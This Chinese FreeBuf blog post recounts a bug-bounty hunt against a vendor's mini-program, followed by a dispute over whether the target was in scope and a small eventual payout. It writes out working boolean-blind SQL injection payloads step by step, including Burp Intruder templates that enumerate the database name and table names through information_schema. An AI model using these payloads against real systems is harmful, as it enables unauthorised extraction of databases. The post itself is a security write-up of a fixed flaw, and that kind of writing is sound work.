freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

与某src厂商斗智斗勇最终拿到赏金
2023-06-13 23:46:59
所属地 贵州省

前言

身为一个菜狗,当然想去src厂商哪里挖掘漏洞,获取赏金得到激励。于是乎,我去补天哪里随便找到一个厂商就开始了我的漏洞挖掘。(注:以下漏洞厂商已修复)

一、信息收集

通过爱企查,查找对方公司的域名,小程序,APP之类的,然后使用360quake,OneForAll,鹰图进行子域名查询等等,

1686669269_648887d5015b07c147c53.png!small?1686669261543

时间太久了,很多图没有截上去,希望大佬勿喷

二、开始漏洞挖掘

在所有web网站进行挑选挖掘后,感觉实在挖不倒(太菜了,没有挖到),于是眼光开始转向新的方向,小程序渗透。至于如何抓包,这里不多讲,网上文章很多。

找找找中,看见一个很新鲜的小程序,于是打开进去,通过burp,看见post请求里面有id,于是测一波看有没有SQL注入

1686669501_648888bdb913d776bca86.png!small?1686669494240

先进行注入判断, 'and 1=1#

1686669554_648888f23b51572d902af.png!small?1686669546737

回显正常

'and 1=2#

1686669606_64888926ce1d6c6627162.png!small?1686669600274

报错了,SQL注入来了啊

可以看出布尔盲注,于是接着构造攻击语句

判断数据库的长度

'and length(database())=8#

1686669723_6488899ba99df64dc69d9.png!small?1686669716526

报错,在

'and length(database())=9#

1686669788_648889dc2de56da39d4f2.png!small?1686669780872

正常回显,说明数据库名为9位数

获取数据库名,这里我们采用burp爆破模式

Payload:’and ascii(substr(database(),1,1))=§1§#

1686669870_64888a2e4f78a37f76ee7.png!small?1686669862922

通过累加1获得数据库的ascii码值,在进行解码,获得数据库名

db_around

接着获取表名

'and ascii(substr((select table_name from information_schema.tables where 
table_schema=database() limit 0,1),1,1))=§9§#

1686670030_64888aceb0c69249f20ec.png!small?1686670023383

依次通过累加limit 的1获取到第一个表名

adb_task

后面就不跑了,交洞交洞,拿赏金去

三、挫折出现

漏洞提交后,静等审核

1686670148_64888b44de9b9f330ec91.png!small?1686670141270

结果,居然打偏了,泪奔,太想哭了,亏自己兴奋一晚上,后面洞就放哪里不管了

然后转折出现,厂商发布收录域名,最后我一看,漏洞的域名属于收录范围啊,兴致冲冲在跑去交洞

又是兴奋的一晚上,结果

1686670364_64888c1cc671dd5732d3a.png!small?1686670357303

哭死,加气死,什么魔鬼啊,拒绝,难受死,理由却是

1686670407_64888c477e1356554b574.png!small?1686670399811

顶不住,就因为挖到洞,就连夜下资产吗,痛哭

最后转折,偷偷私聊审核,让审核帮我,最终在审核的帮助下,我拿到了赏金

1686670487_64888c97d5a83032cf802.png!small?1686670480436

虽然只有一百块,总比没有强,哭死。这个厂商记小本本,以后少碰

结语:这篇文章呢,想告诉大家我的漏洞挖掘思路,其次呢,就是一些厂商如果赏金不肯给的话,一定要想想办法,看能不能解决,不能就当吃哑巴亏吧,记在自己的小本本上,以后注意一点,最后,希望各位大佬天天爆大洞。

# 渗透测试 # web安全
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录